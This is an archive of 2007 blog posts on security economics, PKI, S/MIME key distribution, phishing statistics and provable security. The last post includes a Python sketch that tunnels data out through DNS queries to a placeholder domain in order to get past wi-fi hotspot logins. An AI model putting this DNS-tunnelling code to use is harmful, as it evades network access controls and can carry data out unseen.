    For the first time in Internet history, we now have a situation where the enemy knows us, and is equal to our best. Plus, he's got the capital and infrastructure to build the best tools against us.

    Where are we? If the takedown philosophy is any good data point, we might know ourselves but we know little about the enemy. But, even if we know ourselves, we don't know our weaknesses, and our strengths are useless.

    What's to be done? Bruce Schneier said:

    Redesigning the Microsoft Windows operating system would work, but that's ridiculous to even suggest.

    As I suggested in last year's roundup, we were approaching this decision. Start re-writing, Microsoft. For sake of fairness, I'd expect that Linux and Apple will have a smaller version of the same problem, as the 1970s design of Unix is also a bit out-dated for this job.

    Posted by iang at 07:07 AM | Comments (3) | TrackBack

    September 11, 2007

    If Insurance is the Answer to Identity, what's the Question?

    Over on Second Life, they (LL) are trying to solve a problem by outsourcing identity verification to a company called Integrity. This post puts it in context (warning, it's quite long, longer even than an FC post!):

    So now we understand better what this is all about. In effect, Integrity does not really provide “just a verification service”. Their core business is actually far more interesting: they buy LL’s liability in case LL gets a lawsuit for letting minors to see “inappropriate content”. Even more interesting is that LL does not need to worry about what “inappropriate content” means: this is a cultural question, not a philosophic one, but LL does not need to care. Whatever lawsuits will come LL’s way, they will simply get Integrity to pay for them.

    Put into other words: Integrity is an insurance company. In this day and age where parents basically don’t care what their children are doing, and blame the State for not taking care of a “children-friendly environment” by filing lawsuits against “the big bad companies who display terrible content”, a new business opportunity has arisen: selling insurance against the (albeit remote) possibility that you get a lawsuit for displaying “inappropriate content”.

    (Shorter version maybe here.)

    Over on Perilocity, which is a blog about the insurance world, John S. Quarterman points at the rise of insurance to cover identity theft, from a company called LifeLock.

    I have to give them credit for honesty, though: LifeLock admits right out that the main four preventive things they do you could do for yourself. Beyond that, the main substance they seem to offer is essentially an insurance package:

    "If your Identity is stolen while you are our client, we’re going to do whatever it takes to recover your good name. If you need lawyers, we’re going to hire the best we can find. If you need investigators, accountants, case managers, whatever, they’re yours. If you lose money as a result of the theft, we’re going to give it back to you."

    For $110/year or $10/month, is such an insurance policy overpriced, underpriced, or what?

    It's possibly easier for the second provider to be transparent and open. After all, they are selling insurance for stuff that is a validated disaster. The first provider is trying to cover a problem which is not yet a disaster, so there is a sort of nervousness about baring all.

    How viable is this model? The first thing would be to ask: can't we fix the underlying problem? For identity theft, apparently not: Americans want their identity system because it gives them their credit system, and there aren't too many Americans out there who would give up the right to drive their latest SUV out of the forecourt.

    On the other hand, a potential liability issue within a game would seem to be something that could be solved. After all, the game operator has all the control, and all the players are within their reach. Tonight's pop-quiz: Any suggestions on how to solve the potential for large/class-action suits circling around dodgy characters and identity?

    (Manual trackbacks: Perilocity suggests we need identity insurance in the form of governments taking the problem more seriously and dealing with identity thefts more proactively when they occur.)

    Posted by iang at 05:57 PM | Comments (0) | TrackBack

    September 01, 2007

    How S/MIME could suck slightly less with a simple GETSMIME

    I've been using S/MIME for around a year now for encrypted comms, and I can report that the overall process is easier than OpenPGP. The reasons are twofold:

    1. Thunderbird comes with S/MIME and not OpenPGP. Yes, I know there are plugins, but this decision by the developers is dominating.
    2. I work with a CA, and it is curious to watch them work with their own product. Indeed, it's part of the job. (Actually they also do OpenPGP, but as we all know, OpenPGP works just fine without... See reason 1.)

    Sadly, S/MIME sucks. I reported previously on Thunderbird's most-welcome improvements to its UI (from unworkable to woeful) and also its ability to encrypt-not-sign, which catapulted the tool into legal sensibility. Recall, we don't know what a signature means, and the lawyers say "don't sign anything you don't read" ... I'd defy you to read an S/MIME signed email.

    The problem that then occurs is that the original S/MIME designers (early 1990s?) used an unfortunate trick which is now revealed as truly broken: the keys are distributable with signing.

    Ooops. Worse, the keys are only distributable with signing as far as I can see, which uncovers the drastic failings of tools designed by cryptographers and not software engineers. This sort of failure derives from such claims as, you must sign everything "to be trusted" ... which we disposed of above.

    So, as signing is turned off, we now need to distribute the keys. This occurs by a 2-part protocol that works like this:

    • "Alice, please send me a signed email so I can only get your key."
    • "Bob, here is a signed email that only means you can get my key."

    With various error variations built in. OK, our first communal thought was that this would be workable but it turns out not to scale.

    Consider that we change email clients every 6 months or so, and there appears to be no way to export your key collection. Consider that we use other clients, and we go on holidays every 3 months (or vacations every 12 months), and we lose our laptops or our clients trash our repositories. Some of us even care about cryptographic sanitation, and insist on locking our private keys in our secured laptop in the home vault with guards outside. Which means we can't read a thing from our work account.

    Real work is done with a conspiracy of more than 2. It turns out that with around 6 people in the ring, someone is AFK ("away from keys"), all the time. So, someone cannot read and/or write. This either means that some are tempted to write in clear text (shame!), or we are all running around Alice-Bobbing each other. All the time.

    Now, of course, we could simply turn on signing. This requires (a) a definition of signing, (b) written somewhere like a CPS, (c) which is approved and sustainable in agreements, (d) advised to the users who receive different signature meanings, and (e) acceptance of all the preceding points as meaningful. These are very tough barriers, so don't hold your breath, if we are talking about emails that actually mean something (kid sister, knock yourself out...).

    Turning on the signing also doesn't solve the core problem of key management; it just smothers it somewhat by distributing the keys every chance we get. It still doesn't solve the problem of how to get the keys when you lose your repository, as you are then locked out of posting until you have everyone's keys. In every conspiracy, there's always one important person who's notoriously shy of being called Alice.

    This exposes the core weakness of key management. Public Key cryptography is an engineering concept of 2 people, and beyond that it scales badly. S/MIME's digsig-distro is just a hack, and something like OpenPGP's key server mechanism would be far more sensible, far more scaleable. However, I wonder if we can improve on even OpenPGP, as the mere appearance of a centralised server reduces robustness by definition (TTPs, CVP, central points of attack, etc).

    If an email can be used to send the key (signed), then why can't an email be used to request a key? Imagine that we added an email convention, a little like those old maillist conventions, that did this:

    Subject: GETSMIME fc@example.com

    and send it off. A mailclient like Thunderbird could simply reply by forwarding the key. (How this is done is an exercise for the reader. If you can't think of 3 ways in the next 3 minutes, you need more exercise.)

    Now, the interesting thing about that is that if Tbird could respond to the GETSMIME, we wouldn't need key servers. That is, Alice would simply mail Bob with "GETSMIME Carol@example.com" and Bob's client could respond, perhaps even without asking because Bob already knows Alice. Swarm key distro, in other words. Or, Dave could be a key server that just sits there waiting for the requests, so we've got a key server with no change to the code base.
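
    As a minimal sketch of how a mail client might honour the convention, here is one of those "3 ways", in Python. GETSMIME is the convention proposed above, not an existing standard; the addresses, the CERT_STORE table, and the send_reply() hook are hypothetical placeholders for whatever the client already has.

        # Sketch of a GETSMIME auto-responder hook, under invented assumptions.
        from email.message import EmailMessage

        CERT_STORE = {"fc@example.com": b"...DER-encoded certificate bytes..."}   # hypothetical

        def handle_inbound(msg: EmailMessage, send_reply) -> bool:
            subject = msg.get("Subject", "")
            if not subject.startswith("GETSMIME "):
                return False                      # not a key request; normal processing
            wanted = subject.split(maxsplit=1)[1].strip().lower()
            cert = CERT_STORE.get(wanted)
            if cert is None:
                return False                      # we don't hold that key; stay silent
            reply = EmailMessage()
            reply["To"] = msg["From"]
            reply["Subject"] = f"SMIME {wanted}"
            reply.set_content(f"Certificate for {wanted} attached.")
            reply.add_attachment(cert, maintype="application", subtype="pkcs7-mime",
                                 filename=f"{wanted}.p7c")
            send_reply(reply)                     # swarm key distro: any client can answer
            return True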

    In closing, I'll just remind that the opinion of this blog is that the real solution to the almost infinite suckiness of S/MIME is that the clients should generate the keys opportunistically, and enable use of crypto as and when possible.

    This solution will never be ideal, and that's because we have to deal with email's legacy. But the goal with email is to get to some crypto, some of the time, for some of the users. Our current showing is almost no crypto, almost none of the time, for almost none of the users. Pretty dire results, and nothing a software engineer would ever admit to.

    Posted by iang at 07:47 PM | Comments (1) | TrackBack

    August 23, 2007

    Threatwatch: Numbers on phishing, who's to blame, the unbearable loneliness of 4%

    Jonath over at Mozilla takes up the flame and publishes lots of stats on the current state of SSL, phishing and other defences. Headline issues:

    • Number of SSL sites: 600,000 from Netcraft
    • Cost of phishing to US: $2.1 billion.
    • Number of expired certs: 18%
    • Number of users who blame a glitch in the browser for popups: 4%

    I hope he keeps it up, as it will save this blog from doing it, as it has for many years :) The connection between SSL and phishing can't be overstressed, and it's welcome to see Mozilla take up that case. (Did I forget to mention TLS/SNI in Apache and Microsoft? Shame on me....)

    Jonath concludes with this odd remark:

    If I may be permitted one iota of conclusion-drawing from this otherwise narrative-free post, I would submit this: our users, though they may be confused, have an almost shocking confidence in their browsers. We owe it to them to maintain and improve upon that, but we should take some solace from the fact that the sites which play fast and loose with security, not the browsers that act as messengers of that fact, really are the ones that catch the blame.

    You, like me, may have read that too quickly, and thought that he suggests that the web sites are to blame, with their expired certs, fast and loose security, etc.

    But, he didn't say that, he simply said those are the ones that *are* blamed. And that's true, there are lots and lots of warnings out there, like campaigns to drop SSL v2 and to stop sites doing phishing training, and other things ... The sites certainly catch the blame, that's definitely true.

    But, who really *deserves* the blame? According to the last table in Jonath's post, the users don't really blame the site as much as might be expected: 24%. More are unsure and thus wise, I say: 32%. And yet more imagine an actual attack taking place: 40%.

    That leaves 4% who suspect a "glitch" in the browser itself. Surely one lonely little group there, I wonder if they misunderstood what a "glitch" is... What is a "glitch," anyway, and how did it get into their browsers?

    Posted by iang at 09:06 AM | Comments (0) | TrackBack

    August 09, 2007

    Shock of new Security Advice: "Consider a Mac!"

    From the where did you read it first? department here comes an interesting claim:

    Beyond obvious tips like activating firewalls, shutting computers down when not in use, and exercising caution when downloading software or using public computers, Consumer Reports offered one safety tip that's sure to inflame online passions: Consider a Mac.

    "Although Mac owners face the same problems with spam and phishing as Windows users, they have far less to fear from viruses and spyware," said Consumer Reports.

    Spot the difference between us and them? Consumer Reports is not in the computing industry. What this suggests about being helpful about security will haunt computing psychologists for years to come.

    For amusement, count how many security experts will pounce on the ready excuse:

    "Because Macs are less prevalent than Windows-based machines, online criminals get less of a return on their investment when targeting them."

    Of course if that's true, it becomes less so with every Mac bought.

    Can you say "monoculture!?"



    The report itself from Consumer Reports seems to be for subscribers only. For our ThreatWatch series, the article has many juicy numbers:

    U.S. consumers lost $7 billion over the last two years to viruses, spyware, and phishing schemes, according to Consumer Report's latest State of the Net survey. The survey, based on a national sample of 2,000 U.S. households with Internet access, suggests that consumers face a 25% chance of being victimized online, which represents a slight decline from last year.

    Computer virus infections, reported by 38% of respondents, held steady since last year, which Consumer Reports considers to be a positive sign given the increasing sophistication of virus attacks. Thirty-four percent of respondents' computers succumbed to spyware in the past six months. While this represents a slight decline, according to Consumer Reports, the odds of a spyware infection remain 1 in 3 and the odds of suffering serious damage from spyware are 1 in 11.

    Phishing attacks remained flat, duping some 8% of survey respondents at a median cost of $200 per incident. And 650,000 consumers paid for a product or service advertised through spam in the month before the survey, thereby seeding next year's spam crop.

    Perversely, insecurity means money for computer makers: computer viruses and spyware turn out to be significant drivers of computer sales. According to the study, virus infections drove about 1.8 million households to replace their computers over the past two years. And over the past six months, spyware infestations prompted about 850,000 households to replace their computers.

    Posted by iang at 07:36 AM | Comments (0) | TrackBack

    August 08, 2007

    WebMoney does a gold unit

    Dani reports that WebMoney is now doing a DGC, or gold-based currency.

    This is big news for the gold community, as there is currently (I am told) a resurgence of interest in new gold issuers, perhaps on the expectation that e-gold does not survive the meatgrinders, also known as the Federal prosecutors in Washington D.C. (Perhaps as part of their defence strategy, e-gold now run a blog!)

    What's different about WebMoney? They had financial cryptography thinkers in at the beginning, it seems, and they are successful. They know how to do this stuff. They did it, and they maintained their innovation base. They are big. They do multiple countries. They quite possibly dwarf any other gold operator in overall size, already. I could run through the checklist for a while, and it looks pretty good. (oh, and they do a downloadable client which does some sort of facsimile of blinded transactions, as presented at EFCE!)

    Expect them to take off where e-gold left off, with the exception of the Ponzi based traffic. Big strategic question: will they go green or red on Ponzis?

    Posted by iang at 10:52 AM | Comments (3) | TrackBack

    Microsoft asserts itself as an uber-CA

    In the PKI ("public key infrastructure") world, there is a written practice that the user, sometimes known as the relying party, should read the CPS ("certificate practice statement") and other documents before being qualified to rely on a certificate. This would qualify as industry practice and is sensible, at least on the face of it, in that the CA ("certificate authority") can not divine what you are going to use the cert for. Ergo, the logic goes, as relying party, you have to do some of the work yourself.

    However, in the "PKI-lite" that is in place in x.509 browser and email world, this model has been simplified. Obviously, all of us who've come into contact with user software and the average user know that the notion of a user reading a CPS is so ludicrous that it's hardly worth discussing. Of course, we need another answer.

    There are many suggestions, but the one that is in effect is that the browser, or more precisely, the software vendor, is the one who reads the CPS, on behalf of the users. One way to look at this is that this makes the browser the relying party by proxy, as, in making its assessment, it reads the CPS, measures it against own needs, and relies on audits and other issues. (By way of disclosure, I audit a CA.)

    Unfortunately, it cannot be the relying party because it simply isn't a party to any transaction. The user remains the relying party, but isn't encouraged to do any of the relying and reading stuff that was mentioned above. That is, the user is encouraged to rely on the certificate, the vendor, the CA and the counter-party, all on an article of blind faith in these people and processes she has never heard of.

    This dilemma is better structured as multi-tiered authorities: The CA is the authority on the certificates and their "owners." The software vendor is the authority on the CAs, by means of their CPSs, audits, etc.

    Such a re-drawing of the map has fairly dramatic consequences for the PKI. The widespread perception is that the CA is highly liable -- because that's the "trust" product that they sell -- and the browser is not. In principle, and in contract law, it might be the other way around, as the browser has an agreement with the user, and the CA has not. Where the perception might find comfort is in the doctrine of duty of care but that will generally limit the CA's liability to gross negligence. Either way, the last word on this complicated arrangement might need real lawyers and eventually real courts.

    It has always been somewhat controversial to suggest that the browser is in control, and therefore may need to consider risks, liabilities and obligations. But now, Paul Hoffman has published a rather serious piece of evidence that Microsoft, for its part, has taken on the R/L/O more seriously than thought:

    If a user running Windows XP SP2 in its default configuration removes a root certificate that is one that Microsoft trusts, Windows will re-install that root certificate and again start to trust certificates that come from that root without alerting the user. This re-installation and renewed trust happens as soon as the user visits a SSL-based web site using Internet Explorer or any other web browser that uses the Cryptographic Application Programming Interface (CAPI) built-in to Windows; it will also happen when the user receives secure email using Outlook, Microsoft Mail, or another mail program that uses CAPI, as long as that mail is signed by a certificate that is based on that root certificate.

    In effect, the user is not permitted by the software to make choices of reliance. To complete the picture, Paul was careful to mention the variations (Thunderbird and Firefox are not affected, there is an SP2 feature to disable all updates of roots, Vista has the same problem but no override...).

    This supports the claim, as I suggested above, that the effective state of play -- best practices if you'll pardon the unfortunate term -- is that the software vendor is the uber-CA.

    If we accept this conclusion, then we could conceivably get on and improve security within these limitations, that the user does little or nothing, and the software manufacturer decides everything they possibly can. OK, what's wrong with that? From an architectural position, nothing, especially if it is built-in up-front. Indeed this is one of the core design decisions of the best-of-security-breed applications (x9.59, Skype, SSH, Ricardo, etc. Feel free to suggest any others to the list, it's short and it's lonely.)

    The problem lies in that software control is not stated up-front, and it is indeed denied by large swathes of securityland. I'd not be surprised if Microsoft themselves denied it (and maybe their lawyers would be right, given the rather traumatic link between phishing and mitm-proof-certificates...). The PKI state-of-denial leaves us in a little bit of a mess:

    • uber-CAs probably have some liability, but will likely deny it
    • users are supposed to read the CPS, then rely. But don't or won't, and do.
    • CAs claim to the users as if they have the liability, but write the CPS as if they have none.
    • developers read from the PKI practices book, and write code according to uber-policy...
    • (We can add many other issues which lead PKI into harm, but we are well past the average issue saturation point already.)

    To extract ourselves from this mess probably takes some brave steps. I think I applaud Microsoft's practice, in that at least this makes that little part clearer.

    They are in control, they are (I suggest) a party with risks, liabilities and obligations, so they should get on and make the product as secure as possible, as their primary goal. This includes throwing out bits of PKI best practices that we know to be worst practices.

    They are not the only ones. Mozilla Foundation in recent years has completed a ground-breaking project to define their own CA processes, and this evidences great care and attention, especially in the ascension of the CA to their root list. What does this show other than they are a party of much power, exercising their duty of care?

    Like Microsoft, they (only) care about their users, so they should (only) consider their users, in their security choices.

    Will the CAs follow suit and create a simpler, more aligned product? Possibly not, unless pushed. As a personal remark, the criteria I use in auditing are indeed pushing dramatically in the direction of better care of risks, liabilities and obligations. The work to go there is not easy nor trivial, so it is no wonder that no CA wants to go there (and that may be an answer to those asking why it is taking so long).

    Even if every CA stood forth and laid out a clear risks, liabilities and obligations statement before their relying parties, more would still need to be done. Until the uber-CAs also get on board publically with the liability shift and clearly work with the ramifications of it, we're still likely locked in the old PKI-lite paper regime or shell game that nobody ever used nor believed in.

    For this reason, Microsoft is to be encouraged to make decisions that help the user. We may not like this decision, or every decision, but they are the party that should make them. Old models be damned, as the users surely are in today's insecurity, thanks in part to those very same models.

    Posted by iang at 07:14 AM | Comments (4) | TrackBack

    August 07, 2007

    Security can only be message-based?

    Reading this post from Robert Watson:

    I presented, “Exploiting Concurrency Vulnerabilities in System Call Wrappers,” a paper on the topic of compromising system call interposition-based protection systems, such as COTS virus scanners, OpenBSD and NetBSD’s Systrace, the TIS Generic Software Wrappers Toolkit (GSWTK), and CerbNG. The key insight here is that the historic assumption of “atomicity” of system calls is fallacious, and that on both uniprocessor and multiprocessing systems, it is trivial to construct a race between system call wrappers and malicious user processes to bypass protections. ...

    The moral, for those unwilling to read the paper, is that system call wrappers are a bad idea, unless of course, you’re willing to rewrite the OS to be message-passing.

    And it sparked a thought that systems can only be secure if message-based. Maybe it's a principle, maybe it's a hypothesis, or maybe it's a law.

    (My underlining.) To put this in context, if a system was built using TCP/IP, it's not built with security as its number one, overriding goal. That might be surprising to some, as pretty much all systems are built that way; which is the point, such an aggressive statement partly explains where we are, and partly explains how tricky this stuff is.

    (To name names: SSH is built that way. Sorry, guys. Skype is a hybrid, with both message-passing and connections. Whether it is internally message-passing or connection-oriented I don't know, but I can speculate from my experiences with Ricardo. That latter started out message-passing over connection-oriented, and required complete client-side rewrites to remove the poison. AADS talks as if it is message-passing, and that might be because it is from the payments world, where there is much better understanding of these things.)

    Back to theory. We know from the coordination problem, or the Two Generals problem, that protocols cannot be reliable about what they have sent to the other side. We also know from cryptography that we can create a reliable message on the receive-side (by means of an integrated digsig). We know that "reliable" connections are not reliable in that sense.
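
    A minimal sketch of that receive-side point: a message that carries its own proof, so the receiver verifies the bytes it actually got, whatever the channel claims to have delivered. It assumes the third-party 'cryptography' package and an out-of-band-known sender key; purely illustrative.

        # Self-contained message: signature || payload, verified on receipt.
        from cryptography.hazmat.primitives.asymmetric import ed25519
        from cryptography.exceptions import InvalidSignature

        sender = ed25519.Ed25519PrivateKey.generate()
        sender_pub = sender.public_key()                   # known to the receiver out of band

        def make_message(payload: bytes) -> bytes:
            return sender.sign(payload) + payload          # 64-byte signature, then payload

        def receive(wire_bytes: bytes) -> bytes:
            sig, payload = wire_bytes[:64], wire_bytes[64:]
            sender_pub.verify(sig, payload)                # raises InvalidSignature if tampered
            return payload                                 # reliable, whatever the channel did

        msg = make_message(b"pay bob 10")
        assert receive(msg) == b"pay bob 10"
        try:
            receive(msg[:64] + b"pay eve 99")
        except InvalidSignature:
            print("tampered message rejected on receipt")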

    Also, above, read that last underlined sentence again. Operating systems guys have known for the longest time that the cleanest OS design was message passing (which they didn't push because of the speed issues):

    Concurrency issues have been discussed before in computer security, especially relating to races between applications when accessing /tmp, unexpected signal interruption of socket operations, and distributed systems races, but this paper starts to explore the far more sordid area of OS kernel concurrency and security. Given that even notebook computers are multiprocessor these days, emphasizing the importance of correct synchronization and reasoning about high concurrency is critical to thinking about security correctly. As someone with strong interests in both OS parallelism and security, the parallels (no pun intended) seem obvious: in both cases, the details really matter, and it requires thinking about a proverbial Cartesian Evil Genius. Anyone who’s done serious work with concurrent systems knows that they are actively malicious, so a good alignment for the infamous malicious attacker in security research!

    But none of that says what I asserted above: that if security is your goal, you must choose message-passing.

    Is this intuition? Is there a theory out there? Where are we on the doh!-to-gosh scale?

    Posted by iang at 11:09 AM | Comments (1) | TrackBack

    July 20, 2007

    ROI: security people counting with fingers?

    A curious debate erupted over whether there is ROI on security investments. Normally sane Chris Walsh points to normally sensible Richard Bejtlich, who seems to think that because a security product saves money and cannot make money on its own, it is therefore not an investment, and therefore there cannot be ROI.

    The problem the "return on security investment" (ROSI) crowd has is they equate savings with return. The key principle to understand is that wealth preservation (saving) is not the same as wealth creation (return).

    If you use your fingers to count, you will have problems. The issue here is a simple one of negative numbers and the distinctions between absolute and relative calculations.

    Here's how it works. Invent Widget. Widget generates X in revenue per unit, which includes some small delta x in shrinkage or loss. Call the shrinkage 10% of $100, so we are at an X of $90 in revenues.

    Now, imagine a security tool that reduces the shrinkage by half. X' improves by $5. As X' of $95 is an improvement on your basic position of X at $90, this can then be calculated as an ROI (however that is done).
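
    The same arithmetic, worked as a relative comparison rather than finger-counting. The figures are the illustrative ones above; the tool's price is an invented assumption.

        # Worked example of the shrinkage arithmetic; all figures illustrative.
        gross_revenue  = 100.0
        shrinkage_rate = 0.10
        tool_cost      = 2.0             # hypothetical price of the security tool

        x  = gross_revenue * (1 - shrinkage_rate)        # $90, position without the tool
        x2 = gross_revenue * (1 - shrinkage_rate / 2)    # $95, shrinkage halved by the tool

        benefit = x2 - x                                 # $5 of recovered shrinkage
        roi = (benefit - tool_cost) / tool_cost          # relative return on the outlay
        print(f"benefit ${benefit:.2f}, ROI {roi:.0%}")  # benefit $5.00, ROI 150%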

    What then is the fallacy? One way to put it is like this (edited from original):

    The "savings" you get back are what you already own, and you only need to claw them back.

    No such thing: you don't have it, so it isn't yours to calculate, and resting on some moral or legal position is nonsense. The thief laughs at you, even if the blog evidence is that nobody else notices the joke, including economists who should know better! The thing that Richard is talking about is not "savings" in economic terms but "sunk costs."

    In business terms, too, all numbers and formulas are just models. As the fundamental requirement here is to compare different investments, then as long as we treat "savings" or "shrinkage" or "sunk costs" or whatever the same way in each instance of the model, the result is comparable. Mathematics simply treats negative numbers as the backwards of positive numbers; it doesn't refuse to do it. A "savings" is just a negative number taken from another positive number that might be called the "ideal maximum".

    Having said all that, Richard's other points are spot on:

    • Calculating ROI is wrong; it should be NPV. If you are not using NPV then you're out of court, because so much of security investment is future-oriented. (A minimal NPV sketch follows this list.)
    • Predicting the "savings" from a security investment is hard. There are few metrics, and they are next to useless. No security seller will give them to you. So you are left predicting from no base of information.
    • Hence the excessively hopeful interest in metrics conferences and breach reports. But, like Richard, I treat that skeptically. Yes, it will help. No, it won't make the NPV calculations anywhere near useful enough to be accurate.
    • NPV is therefore not going to help that much, because the predictions feeding it are wildly unfounded. NPV therefore suffers from GIGO -- garbage-in-garbage-out! (more)
    • You need something else.
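
    Here is the minimal NPV sketch promised in the first point above: the predicted annual "savings" are discounted, so a claimed saving years out is worth less today. The cash flows and discount rate are invented for illustration; GIGO applies to them just as the list says.

        # Net present value of an up-front security outlay and predicted annual savings.
        def npv(rate: float, cashflows: list[float]) -> float:
            """cashflows[0] is today's outlay (negative); later entries are predicted savings."""
            return sum(cf / (1 + rate) ** t for t, cf in enumerate(cashflows))

        # Hypothetical: spend 100 now, predict savings of 40 in each of the next 3 years, 10% rate.
        print(round(npv(0.10, [-100.0, 40.0, 40.0, 40.0]), 2))   # about -0.53: marginal at best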

    In closing, it still remains the case that security people say their managers don't understand security. And, as above, managers are safe in assuming that security people don't understand business. Another point that is starting to become more widely accepted, thank heavens, again spotted recently from the sensibly sane Arthur (Chris Walsh :).

    Posted by iang at 09:05 AM | Comments (9) | TrackBack

    July 05, 2007

    Metricon 2.0 -- Boston, 7.Aug.2007 -- talks announced

    Gunnar Peterson writes: The agenda for Metricon 2.0 in Boston, August 7th, has been set. Metricon is co-located with the Usenix security conference. The details, travel info, registration, and agenda are here.

    There are a limited number of openings so please REGISTER SOON if interested in attending. A summary of the presentations:

  • "Do Metrics Matter?"
  • "Security Meta Metrics--Measuring Agility, Learning, and Unintended
    Consequence"
  • "Security Metrics in Practice: Development of a Security Metric System to
    Rate Enterprise Software"
  • "A Software Security Risk Classification System"
  • "Web Application Security Metrics"
  • "Operational Security Risk Metrics: Definitions, Calculations, and
    Visualizations"
  • "Metrics for Network Security Using Attack Graphs: A Position Paper"
  • "Software Security Weakness Scoring"
  • "Developing secure applications with metrics in mind"
  • "Correlating Automated Static Analysis Alert Density to Reported Vulnerabilities in Sendmail"


    Posted by iang at 02:09 AM | Comments (0) | TrackBack
    May 22, 2007

    No such thing as provable security?

    I have a lot of skepticism about the notion of provable security.

    To some extent this is just efficient hubris -- I can't do it so it can't be any good. Call it chutzpah, if you like, but there's slightly more relevance to that than egotism, as, if I can't do it, it generally signals that businesses will have a lot of trouble dealing with it. Not because there aren't enough people better than me, but because, if those that can do it cannot explain it to me, then they haven't got much of a chance in explaining it to the average business.

    Added to that, there has been a steady stream of "proofs" that have been broken, and "proven systems" that have been bypassed. If you look at it from a scientific investigative point of view, generally, the proof only works because the assumptions are so constrained that they eventually leave the realm of reality, and that's particularly dangerous to do in security work.

    Added to all that: The ACM is awarding its Gödel prize for a proof that there is no proof:

    In a paper titled "Natural Proofs" originally presented at the 1994 ACM STOC, the authors found that a wide class of proof techniques cannot be used to resolve this challenge unless widely held conventions are violated. These conventions involve well-defined instructions for accomplishing a task that rely on generating a sequence of numbers (known as pseudo-random number generators). The authors' findings apply to computational problems used in cryptography, authentication, and access control. They show that other proof techniques need to be applied to address this basic, unresolved challenge.

    The findings of Razborov and Rudich, published in a journal paper entitled "Natural Proofs" in the Journal of Computer and System Sciences in 1997, address a problem that is widely considered the most important question in computing theory. It has been designated as one of seven Prize Problems by the Clay Mathematics Institute of Cambridge, Mass., which has allocated $1 million for solving each problem. It asks - if it is easy to check that a solution to a problem is correct, is it also easy to solve the problem? This problem is posed to determine whether questions exist whose answer can be quickly checked, but which require an impossibly long time to solve.

    The paper proves that there is no so-called "Natural Proof" that certain computational problems often used in cryptography are hard to solve. Such cryptographic methods are critical to electronic commerce, and though these methods are widely thought to be unbreakable, the findings imply that there are no Natural Proofs for their security.

    If so, this can count as a plus point for risk management, and a minus point for the school of no-risk security. However hard you try, any system you put in place will have some chances of falling flat on its face. Deal with it; the savvy financial cryptographer puts in place a strong system, then moves on to addressing what happens when it breaks.

    The "Natural Proofs" result certainly matches my skepticism, but I guess we'll have to wait for the serious mathematicians to prove that it isn't so ... perhaps by proving that it is not possible to prove that there is no proof?

    Posted by iang at 08:21 AM | Comments (3) | TrackBack

    May 21, 2007

    When to bolt on the security afterwards...

    For some obscure reason, this morning I ploughed through the rather excellent but rather deep tome of Peter Gutmann's Cryptographic Security Architecture - Design and Verification (or at least an older version of chapter 2, taken from his thesis).

    He starts out by saying:

    Security-related functions which handle sensitive data pervade the architecture, which implies that security needs to be considered in every aspect of the design, and must be designed in from the start (it’s very difficult to bolt on security afterwards).

    And then spends much of the chapter showing why it is very difficult to design it in from the start.

    When, then, to design security in at the beginning and when to bolt it on afterwards? In my Hypotheses and in the GP essays I suggest it is impractical to design the security in up-front.

    But there still seems to be a space where you do exactly that: design the security in up-front. If Peter G can write a book about it, if security consultants take it as unquestionable mantra, and if I have done it myself, then we need to bring these warring viewpoints closer to defined borders, if not actual peace.

    Musing on this, it occurs to me that we design security up front when the mission is security. And not, if not. What this means is open to question, but we can tease out some clues.

    A mission is that which when you have achieved it, you have succeeded, and if you have not, you have failed. It sounds fairly simple when put in those terms, and perhaps an example from today's world of complicated product will help.

    For example a car. Marketing demands back-seat DVD players, online Internet, hands-free phones, integrated interior decorative speakers, two-tone metallised paint and go-faster tail trim. This is really easy to do, unless you are trying to build a compact metal box that also has to get 4 passengers from A to B. That is, the mission is transporting the passengers, not their entertainment or social values.

    This hypothesis would have it that we simply have to divide the world's applications into those where security is the mission, and those where some other mission pertains.

    E.g., with payment systems, we can safely assume that security is the mission. A payment system without security is an accounting system, not a payment system. Similar logic with an Internet server control tool.

    With a wireless TCP/IP device, we cannot be so dismissive; an 802.11 wireless internet interface is still good for something if there is no security in it at all. A wireless net without security is still a wireless net. Similar logic with a VoIP product.

    (For example, our favourite crypto tools, SSH and Skype, fall on opposing sides of the border. Or see the BSD's choice.)

    So this speaks to requirements; a hypothesis might be that in the phase of requirements, first establish your mission. If your mission speaks to security, first, then design security up front. If your mission speaks to other things, then bolt on the security afterwards.

    Is it that simple?

    Posted by iang at 07:01 AM | Comments (5) | TrackBack

    May 08, 2007

    Threatwatch: Still searching for the economic MITM

    One of the things we know is that MITMs (man-in-the-middle attacks) are possible, but almost never seen in the wild. Phishing is a huge exception, of course. Another fertile area is wireless lans, especially around coffee shops. Correctly, people have pointed to this point as a likely area where MITMs would break out.

    Incorrectly, people have typically confused possibility with action. Here's the latest "almost evidence" of MITMs, breathtakingly revealed by the BBC:

    In a chatroom used to discuss the technique, also known as a 'man in the middle' attack, Times Online saw information changing hands about how security at wi-fi hotspots – of which there are now more than 10,000 in the UK – can be bypassed.

    During one exchange in a forum entitled 'T-Mobile or Starbucks hotspot', a user named aarona567 asks: "will a man in the middle type attack prove effective? Any input/suggestions greatly appreciated?"

    "It's easy," a poster called 'itseme' replies, before giving details about how the fake network should be set up. "Works very well," he continues. "The only problem is,that its very slow ~3-4 Kb/s...."

    Another participant, called 'baalpeteor', says: "I am now able to tunnel my way around public hotspot logins...It works GREAT. The dns method now seems to work pass starbucks login."

    Now, the last paragraph is something else: it refers to the ability to tunnel through DNS to get uncontrolled access to the net. This is typically possible if you run your own DNS server and install some patches and stuff. This is useful, and economically sensible for anyone to do, although technically it may be infringing behaviour to gain access to the net from someone else's infrastructure (laws and attitudes varying...).
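
    To make the mechanics a little more concrete, here is a minimal sketch of the outbound half of the trick, in Python. The domain tunnel.example.com is a placeholder for an authoritative name server the tunneller would have to run themselves; a working tunnel also needs that server to decode the queries and smuggle replies back in the answers.

        # Sketch only: smuggle data out through DNS lookups that a captive
        # portal typically lets through even before login.  Assumes you run
        # the authoritative name server for tunnel.example.com (hypothetical).
        import base64
        import socket

        def send_via_dns(payload: bytes, domain: str = "tunnel.example.com") -> None:
            # base32 keeps the data legal inside a hostname label (max 63 chars)
            encoded = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
            for i in range(0, len(encoded), 60):
                name = encoded[i:i + 60] + "." + domain
                try:
                    # the hotspot's resolver forwards this upstream to your server
                    socket.gethostbyname(name)
                except socket.gaierror:
                    pass  # we only care that the query left the local network

        send_via_dns(b"hello from behind the hotspot login")

    Real tunnelling tools carry data both ways by stuffing the downstream into TXT or NULL records, which is why the slow speeds quoted above are no surprise.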

